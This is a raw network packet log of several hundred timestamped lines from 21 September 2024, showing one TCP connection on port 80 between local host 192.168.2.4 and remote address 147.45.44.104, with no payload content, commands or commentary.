Sep 21, 2024 18:52:07.556998014 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:07.557035923 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:07.557094097 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:07.557127953 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:07.557234049 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:07.557234049 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:07.557838917 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:07.557897091 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:07.557910919 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:07.557957888 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:07.557967901 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:07.558005095 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:07.558013916 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:07.558043003 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:07.558048964 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:07.558089018 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:07.558671951 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:07.558729887 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:07.558732986 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:07.558768034 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:07.558779001 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:07.558811903 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:07.558835983 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:07.558882952 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:07.561527967 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:07.561597109 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.638317108 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.638391018 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.638436079 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.638444901 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.638467073 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.638479948 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.638492107 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.638514996 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.638528109 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.638550043 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.638570070 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.638583899 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.638605118 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.638617992 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.638632059 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.638669014 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.638834953 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.638869047 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.638900995 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.638916969 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.638921022 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.638956070 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.638971090 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.638991117 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.639003038 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.639040947 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.639041901 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.639075041 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.639091015 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.639111042 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.639123917 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.639159918 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.639342070 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.639374971 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.639405966 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.639426947 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.639446020 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.639480114 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.639497042 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.639513969 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.639548063 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.639565945 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.639565945 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.639585972 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.639599085 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.639599085 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.639632940 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.639636040 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.639658928 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.639666080 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.639689922 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.639702082 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.639720917 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.639750004 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.640110016 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.640142918 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.640177965 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.640213966 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.640218019 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.640253067 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.640268087 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.640286922 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.640321016 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.640330076 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.640350103 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.640373945 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.640383005 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.640410900 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.640418053 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.640450001 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.640451908 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.640474081 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.640485048 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.640513897 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.640522957 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.640542984 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.640546083 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.640568972 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.640575886 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.640594006 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.640610933 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.640640974 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.640644073 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.640665054 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.640696049 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.640942097 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.640978098 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.641010046 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.641010046 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.641031981 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.641047001 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.641129017 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.643217087 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.643784046 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.643841982 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.643862009 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.643876076 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.643907070 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.643913031 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.643937111 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.643966913 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.644031048 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.644064903 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.644088030 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.644118071 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.644130945 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.644164085 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.644181967 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.644201040 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.644217014 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.644253016 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.645890951 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.645946980 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.645967960 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.645982981 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.645999908 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.646034956 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.646092892 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.646126986 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.646147013 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.646161079 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.646178961 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.646203995 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.646219969 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.646264076 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.646279097 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.646330118 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.646337986 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.646348000 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.646382093 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.646405935 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.646471024 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.646505117 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.646522045 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.646538973 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.646555901 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.646576881 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.646586895 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.646620035 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.646636009 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.646688938 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.646688938 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.646722078 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.646737099 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.646755934 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.646770954 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.646790028 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.646804094 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.646838903 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.647099972 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.647152901 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.647155046 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.647190094 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.647208929 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.647239923 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.647304058 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.647337914 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.647351980 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.647372007 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.647403002 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.647420883 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.647423029 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.647463083 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.647471905 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.647497892 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.647515059 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.647546053 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.647583961 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.647618055 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.647634029 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.647674084 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.648133993 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.648142099 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.648180962 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.648188114 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.648217916 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.648243904 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.648250103 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.648284912 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.648303032 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.648318052 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.648334026 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.648354053 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.648370028 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.648394108 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.648411036 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.648444891 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.648447990 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.648483992 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.648516893 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.648555040 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.648597956 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.649017096 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.649087906 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.649117947 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.649153948 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.649173021 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.649204969 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.649208069 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.649250031 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.649260044 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.649286985 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.649302959 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.649338961 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.649374962 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.649408102 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.649425030 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.649442911 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.649457932 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.649477005 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.649488926 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.649524927 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.649524927 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.649579048 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.650027037 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.650080919 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.650089025 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.650115967 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.650137901 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.650167942 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.650229931 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.650264025 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.650284052 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.650298119 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.650306940 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.650333881 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.650353909 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.650381088 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.650388002 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.650413036 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.650434971 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.650445938 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.650461912 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.650480986 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.650497913 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.650531054 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.651006937 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.651041031 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.651070118 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.651093006 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.651089907 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.651128054 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.651145935 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.651161909 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.651185036 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.651211977 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.651281118 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.651314974 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.651335001 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.651349068 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.651375055 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.651401043 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.651401043 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.651451111 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.651458979 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.651488066 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.651511908 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.651537895 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.651952982 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.652026892 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.652034044 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.652070045 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.652089119 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.652106047 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.652117014 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.652163029 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.652190924 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.652225018 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.652256012 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.652261972 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.652287006 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.652297020 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.652313948 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.652333975 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.652347088 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.652394056 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.652414083 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.652446985 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.652466059 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.652501106 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.653036118 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.653089046 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.653126001 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.653125048 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.653152943 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.653160095 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.653176069 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.653213978 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.653235912 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.653289080 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.653373957 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.653429031 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.653445959 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.653476954 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.653542042 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.653594017 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.653597116 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.653604984 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.653650999 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.653723001 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.653738022 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.653744936 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.653768063 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.653810978 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.653867006 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.653878927 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.653888941 CEST	80	49764	147.45.44.104	192.168.2.4
